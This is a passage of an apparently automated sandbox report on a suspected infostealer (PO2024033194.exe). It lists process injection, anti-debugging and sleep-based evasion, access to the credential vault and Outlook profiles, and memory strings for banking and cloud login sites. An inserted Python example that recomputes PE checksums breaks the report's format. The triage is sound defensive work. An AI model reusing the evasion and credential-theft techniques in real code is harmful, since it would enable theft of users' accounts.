            Source: C:\Windows\SysWOW64\replace.exe Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\replace.exe Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\replace.exe Section loaded: mlang.dll
            Source: C:\Windows\SysWOW64\replace.exe Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\replace.exe Section loaded: winsqlite3.dll
            Source: C:\Windows\SysWOW64\replace.exe Section loaded: vaultcli.dll
            Source: C:\Windows\SysWOW64\replace.exe Section loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\replace.exe Section loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\replace.exe Section loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\PO2024033194.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
            Source: C:\Windows\SysWOW64\replace.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: PO2024033194.exe Static file information: File size 1415239 > 1048576
            Source: Binary string: replace.pdb source: svchost.exe, 00000002.00000002.2272256633.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2240619932.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, drBzjAnGBElC.exe, 00000003.00000003.2210655063.0000000000FDB000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: replace.pdbGCTL source: svchost.exe, 00000002.00000002.2272256633.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2240619932.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, drBzjAnGBElC.exe, 00000003.00000003.2210655063.0000000000FDB000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: drBzjAnGBElC.exe, 00000003.00000000.2188627925.0000000000B7E000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: PO2024033194.exe, 00000000.00000003.2152209643.0000000004770000.00000004.00001000.00020000.00000000.sdmp, PO2024033194.exe, 00000000.00000003.2153477802.00000000045D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2171329849.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2272324167.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2272324167.000000000339E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2173389213.0000000003000000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000004.00000002.4625999539.0000000003C1E000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000004.00000003.2272345888.000000000372B000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000004.00000002.4625999539.0000000003A80000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000004.00000003.2274426157.00000000038D6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: PO2024033194.exe, 00000000.00000003.2152209643.0000000004770000.00000004.00001000.00020000.00000000.sdmp, PO2024033194.exe, 00000000.00000003.2153477802.00000000045D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2171329849.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2272324167.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2272324167.000000000339E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2173389213.0000000003000000.00000004.00000020.00020000.00000000.sdmp, replace.exe, replace.exe, 00000004.00000002.4625999539.0000000003C1E000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000004.00000003.2272345888.000000000372B000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000004.00000002.4625999539.0000000003A80000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000004.00000003.2274426157.00000000038D6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: drBzjAnGBElC.exe, 00000003.00000002.4631661117.0000000005D9C000.00000004.80000000.00040000.00000000.sdmp, replace.exe, 00000004.00000002.4626763608.00000000040AC000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000004.00000002.4619808862.0000000003370000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.2571131599.0000000021F5C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: drBzjAnGBElC.exe, 00000003.00000002.4631661117.0000000005D9C000.00000004.80000000.00040000.00000000.sdmp, replace.exe, 00000004.00000002.4626763608.00000000040AC000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000004.00000002.4619808862.0000000003370000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.2571131599.0000000021F5C000.00000004.80000000.00040000.00000000.sdmp
            Source: C:\Users\user\Desktop\PO2024033194.exe Code function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress
            Source: PO2024033194.exe Static PE information: real checksum: 0xa961f should be: 0x15caf6
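The checksum finding above compares the CheckSum field stored in the PE optional header (0xa961f) with the value the imagehlp algorithm produces for the file as it is now (0x15caf6). A mismatch means the bytes were changed after the header was written, which is common for packed or patched samples but also for unsigned builds whose linker never set the field, so it is a triage signal rather than proof of tampering. The script below is an added example and not part of the Joe Sandbox report: it recomputes the checksum with the same word-sum-with-carry-fold algorithm that pefile's generate_checksum() implements, and builds a minimal, non-loadable PE skeleton in memory so the example runs without a sample on disk; pass real file bytes to pe_checksum_report() in practice.

```python
"""Recompute IMAGE_OPTIONAL_HEADER.CheckSum and compare it with the stored value.
The minimal PE image built here is constructed for the example; it is parseable
but not loadable."""
import struct

COFF_HEADER_SIZE = 20
CHECKSUM_OFFSET_IN_OPTIONAL_HEADER = 64   # same field offset for PE32 and PE32+


def checksum_field_offset(data: bytes) -> int:
    """File offset of the CheckSum field, located via e_lfanew and the PE signature."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ file")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    off = e_lfanew + 4 + COFF_HEADER_SIZE + CHECKSUM_OFFSET_IN_OPTIONAL_HEADER
    if off % 4:
        raise ValueError("CheckSum field is not 4-byte aligned")
    return off


def compute_pe_checksum(data: bytes) -> int:
    """Sum every 32-bit word except the CheckSum field with end-around carry,
    fold the result to 16 bits, then add the file length."""
    skip = checksum_field_offset(data)
    total = 0
    for i in range(0, len(data), 4):
        if i == skip:
            continue
        total += int.from_bytes(data[i:i + 4].ljust(4, b"\0"), "little")
        total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total += total >> 16
    return (total & 0xFFFF) + len(data)


def stored_checksum(data: bytes) -> int:
    return struct.unpack_from("<I", data, checksum_field_offset(data))[0]


def set_checksum(data: bytes, value: int) -> bytes:
    """Return a copy of data with the CheckSum field overwritten."""
    buf = bytearray(data)
    struct.pack_into("<I", buf, checksum_field_offset(data), value)
    return bytes(buf)


def pe_checksum_report(data: bytes) -> dict:
    stored, computed = stored_checksum(data), compute_pe_checksum(data)
    return {"stored": stored, "computed": computed, "valid": stored == computed}


def build_minimal_pe(stored: int = 0, size: int = 512) -> bytes:
    """Constructed PE32 skeleton: DOS header, PE signature, COFF header,
    224-byte optional header (magic 0x10B), deterministic filler to `size` bytes."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                      # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x014C, 1, 0, 0, 0, 224, 0x0102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)
    struct.pack_into("<I", opt, CHECKSUM_OFFSET_IN_OPTIONAL_HEADER, stored)
    img = bytes(dos) + b"PE\0\0" + coff + bytes(opt)
    return img + bytes(i & 0xFF for i in range(size - len(img)))


if __name__ == "__main__":
    # Stored value taken from the report's finding; the skeleton's computed
    # value will of course differ from the real sample's 0x15caf6.
    print(pe_checksum_report(build_minimal_pe(stored=0xA961F)))
```

Because the CheckSum field itself is skipped during the sum, writing the computed value back into the header (set_checksum) yields a file that verifies; that is also why a mismatch is only informative when the rest of the file is known to be the original build.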
            Source: C:\Users\user\Desktop\PO2024033194.exe Code function: 0_2_00416CB5 push ecx; ret 0_2_00416CC8
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_003AA036 push edi; ret 2_2_003AA03F
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_003A8027 push ds; ret 2_2_003A8028
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_003A4079 pushfd ; iretw 2_2_003A40C6
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_003BD853 push edi; iretd 2_2_003BD85C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_003A4158 push edi; ret 2_2_003A4159
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0039D1BA push ss; retf 2_2_0039D1BB
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0039222C push ecx; retf 2_2_0039231F
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_003AAA87 push edi; iretd 2_2_003AAA93
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0039D3DC push es; ret 2_2_0039D3E2
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_003A543B push ebp; iretd 2_2_003A543C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_003A5474 push edx; ret 2_2_003A5475
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_003934A0 push eax; ret 2_2_003934A2
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_003A8D13 push edi; ret 2_2_003A8D14
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00398682 push fs; iretd 2_2_00398684
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_003A7F3A push ecx; retf 2_2_003A7F3B
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_003A3F43 pushfd ; iretw 2_2_003A40C6
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032309AD push ecx; mov dword ptr [esp], ecx 2_2_032309B6
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe Code function: 3_2_081F6823 push edi; iretd 3_2_081F682F
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe Code function: 3_2_081E616C push ebp; iretd 3_2_081E616D
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe Code function: 3_2_081F11D7 push ebp; iretd 3_2_081F11D8
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe Code function: 3_2_081F1210 push edx; ret 3_2_081F1211
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe Code function: 3_2_081F5DD2 push edi; ret 3_2_081F5DDB
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe Code function: 3_2_082095EF push edi; iretd 3_2_082095F8
            Source: C:\Windows\SysWOW64\replace.exe Code function: 4_2_03A8225F pushad ; ret 4_2_03A827F9
            Source: C:\Windows\SysWOW64\replace.exe Code function: 4_2_03A827FA pushad ; ret 4_2_03A827F9
            Source: C:\Windows\SysWOW64\replace.exe Code function: 4_2_03AB09AD push ecx; mov dword ptr [esp], ecx 4_2_03AB09B6
            Source: C:\Windows\SysWOW64\replace.exe Code function: 4_2_03A8283D push eax; iretd 4_2_03A82858
            Source: C:\Windows\SysWOW64\replace.exe Code function: 4_2_03A81368 push eax; iretd 4_2_03A81369
            Source: C:\Windows\SysWOW64\replace.exe Code function: 4_2_0324A3B0 push edi; iretd 4_2_0324A3B9
            Source: C:\Windows\SysWOW64\replace.exe Code function: 4_2_03240294 push 8DB602B4h; retf 4_2_0324029A
            Source: C:\Users\user\Desktop\PO2024033194.exe Code function: 0_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed
            Source: C:\Users\user\Desktop\PO2024033194.exe Code function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput
            Source: C:\Windows\SysWOW64\replace.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\replace.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\replace.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\replace.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\replace.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\PO2024033194.exe API/Special instruction interceptor: Address: 4166324
            Source: C:\Windows\SysWOW64\replace.exe API/Special instruction interceptor: Address: 7FFDB442D324
            Source: C:\Windows\SysWOW64\replace.exe API/Special instruction interceptor: Address: 7FFDB442D7E4
            Source: C:\Windows\SysWOW64\replace.exe API/Special instruction interceptor: Address: 7FFDB442D944
            Source: C:\Windows\SysWOW64\replace.exe API/Special instruction interceptor: Address: 7FFDB442D504
            Source: C:\Windows\SysWOW64\replace.exe API/Special instruction interceptor: Address: 7FFDB442D544
            Source: C:\Windows\SysWOW64\replace.exe API/Special instruction interceptor: Address: 7FFDB442D1E4
            Source: C:\Windows\SysWOW64\replace.exe API/Special instruction interceptor: Address: 7FFDB4430154
            Source: C:\Windows\SysWOW64\replace.exe API/Special instruction interceptor: Address: 7FFDB442DA44
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_003A480C rdtsc
            Source: C:\Windows\SysWOW64\replace.exe Window / User API: threadDelayed 4501
            Source: C:\Windows\SysWOW64\replace.exe Window / User API: threadDelayed 5472
            Source: C:\Users\user\Desktop\PO2024033194.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes graph_0-87516
            Source: C:\Users\user\Desktop\PO2024033194.exe API coverage: 3.3 %
            Source: C:\Windows\SysWOW64\svchost.exe API coverage: 0.7 %
            Source: C:\Windows\SysWOW64\replace.exe API coverage: 2.6 %
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe TID: 5664 Thread sleep time: -90000s >= -30000s
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe TID: 5664 Thread sleep count: 43 > 30
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe TID: 5664 Thread sleep time: -64500s >= -30000s
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe TID: 5664 Thread sleep count: 45 > 30
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe TID: 5664 Thread sleep time: -45000s >= -30000s
            Source: C:\Windows\SysWOW64\replace.exe TID: 2748 Thread sleep count: 4501 > 30
            Source: C:\Windows\SysWOW64\replace.exe TID: 2748 Thread sleep time: -9002000s >= -30000s
            Source: C:\Windows\SysWOW64\replace.exe TID: 2748 Thread sleep count: 5472 > 30
            Source: C:\Windows\SysWOW64\replace.exe TID: 2748 Thread sleep time: -10944000s >= -30000s
            Source: C:\Windows\SysWOW64\replace.exe Last function: Thread delayed
            Source: C:\Windows\SysWOW64\replace.exe Last function: Thread delayed
            Source: C:\Users\user\Desktop\PO2024033194.exe Code function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose
            Source: C:\Users\user\Desktop\PO2024033194.exe Code function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
            Source: C:\Users\user\Desktop\PO2024033194.exe Code function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
            Source: C:\Users\user\Desktop\PO2024033194.exe Code function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose
            Source: C:\Users\user\Desktop\PO2024033194.exe Code function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose
            Source: C:\Users\user\Desktop\PO2024033194.exe Code function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
            Source: C:\Users\user\Desktop\PO2024033194.exe Code function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose
            Source: C:\Users\user\Desktop\PO2024033194.exe Code function: 0_2_0045DE8F FindFirstFileW,FindClose
            Source: C:\Users\user\Desktop\PO2024033194.exe Code function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose
            Source: C:\Windows\SysWOW64\replace.exe Code function: 4_2_0323C230 FindFirstFileW,FindNextFileW,FindClose
            Source: C:\Users\user\Desktop\PO2024033194.exe Code function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary
            Source: 6U0173jM.4.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
            Source: 6U0173jM.4.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
            Source: 6U0173jM.4.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
            Source: 6U0173jM.4.drBinary or memory string: discord.comVMware20,11696487552f
            Source: 6U0173jM.4.drBinary or memory string: bankofamerica.comVMware20,11696487552x
            Source: firefox.exe, 00000008.00000002.2572599815.000001AE21F1E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll~~J
            Source: 6U0173jM.4.drBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
            Source: 6U0173jM.4.drBinary or memory string: ms.portal.azure.comVMware20,11696487552
            Source: 6U0173jM.4.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
            Source: 6U0173jM.4.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
            Source: 6U0173jM.4.drBinary or memory string: global block list test formVMware20,11696487552
            Source: 6U0173jM.4.drBinary or memory string: tasks.office.comVMware20,11696487552o
            Source: 6U0173jM.4.drBinary or memory string: AMC password management pageVMware20,11696487552
            Source: drBzjAnGBElC.exe, 00000003.00000002.4625009743.0000000000FDE000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000004.00000002.4619808862.0000000003370000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: 6U0173jM.4.drBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
            Source: 6U0173jM.4.drBinary or memory string: interactivebrokers.comVMware20,11696487552
            Source: 6U0173jM.4.drBinary or memory string: dev.azure.comVMware20,11696487552j
            Source: 6U0173jM.4.drBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
            Source: 6U0173jM.4.drBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
            Source: 6U0173jM.4.drBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
            Source: 6U0173jM.4.drBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
            Source: 6U0173jM.4.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
            Source: 6U0173jM.4.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
            Source: 6U0173jM.4.drBinary or memory string: outlook.office365.comVMware20,11696487552t
            Source: 6U0173jM.4.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
            Source: 6U0173jM.4.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
            Source: 6U0173jM.4.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
            Source: 6U0173jM.4.drBinary or memory string: outlook.office.comVMware20,11696487552s
            Source: 6U0173jM.4.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
            Source: 6U0173jM.4.drBinary or memory string: turbotax.intuit.comVMware20,11696487552t
            Source: 6U0173jM.4.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
            Source: 6U0173jM.4.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
            Source: 6U0173jM.4.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
            Source: C:\Users\user\Desktop\PO2024033194.exeAPI call chain: ExitProcess graph end nodegraph_0-86639
Source: C:\Windows\SysWOW64\svchost.exe | Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\svchost.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\replace.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_003A480C rdtsc | 2_2_003A480C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_003A75E3 LdrLoadDll, | 2_2_003A75E3
Source: C:\Users\user\Desktop\PO2024033194.exe | Code function: 0_2_0045A370 BlockInput, | 0_2_0045A370
Source: C:\Users\user\Desktop\PO2024033194.exe | Code function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW, | 0_2_0040D590
Source: C:\Users\user\Desktop\PO2024033194.exe | Code function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress, | 0_2_0040EBD0
Source: C:\Users\user\Desktop\PO2024033194.exe | Code function: 0_2_04166590 mov eax, dword ptr fs:[00000030h] | 0_2_04166590
Source: C:\Users\user\Desktop\PO2024033194.exe | Code function: 0_2_041665F0 mov eax, dword ptr fs:[00000030h] | 0_2_041665F0
Source: C:\Users\user\Desktop\PO2024033194.exe | Code function: 0_2_04164F40 mov eax, dword ptr fs:[00000030h] | 0_2_04164F40
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0326A30B mov eax, dword ptr fs:[00000030h] | 2_2_0326A30B
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0326A30B mov eax, dword ptr fs:[00000030h] | 2_2_0326A30B
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0326A30B mov eax, dword ptr fs:[00000030h] | 2_2_0326A30B
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0322C310 mov ecx, dword ptr fs:[00000030h] | 2_2_0322C310
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03250310 mov ecx, dword ptr fs:[00000030h] | 2_2_03250310
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032D437C mov eax, dword ptr fs:[00000030h] | 2_2_032D437C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h] | 2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h] | 2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h] | 2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h] | 2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h] | 2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h] | 2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h] | 2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h] | 2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h] | 2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h] | 2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h] | 2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h] | 2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h] | 2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h] | 2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h] | 2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032B035C mov eax, dword ptr fs:[00000030h] | 2_2_032B035C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032B035C mov eax, dword ptr fs:[00000030h] | 2_2_032B035C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032B035C mov eax, dword ptr fs:[00000030h] | 2_2_032B035C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032B035C mov ecx, dword ptr fs:[00000030h] | 2_2_032B035C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032B035C mov eax, dword ptr fs:[00000030h] | 2_2_032B035C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032B035C mov eax, dword ptr fs:[00000030h] | 2_2_032B035C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032FA352 mov eax, dword ptr fs:[00000030h] | 2_2_032FA352
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032D8350 mov ecx, dword ptr fs:[00000030h] | 2_2_032D8350
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0322E388 mov eax, dword ptr fs:[00000030h] | 2_2_0322E388
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0322E388 mov eax, dword ptr fs:[00000030h] | 2_2_0322E388
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0322E388 mov eax, dword ptr fs:[00000030h] | 2_2_0322E388
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0325438F mov eax, dword ptr fs:[00000030h] | 2_2_0325438F
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0325438F mov eax, dword ptr fs:[00000030h] | 2_2_0325438F
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03228397 mov eax, dword ptr fs:[00000030h] | 2_2_03228397
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03228397 mov eax, dword ptr fs:[00000030h] | 2_2_03228397
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03228397 mov eax, dword ptr fs:[00000030h] | 2_2_03228397
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h] | 2_2_032403E9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h] | 2_2_032403E9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h] | 2_2_032403E9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h] | 2_2_032403E9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h] | 2_2_032403E9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h] | 2_2_032403E9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h] | 2_2_032403E9
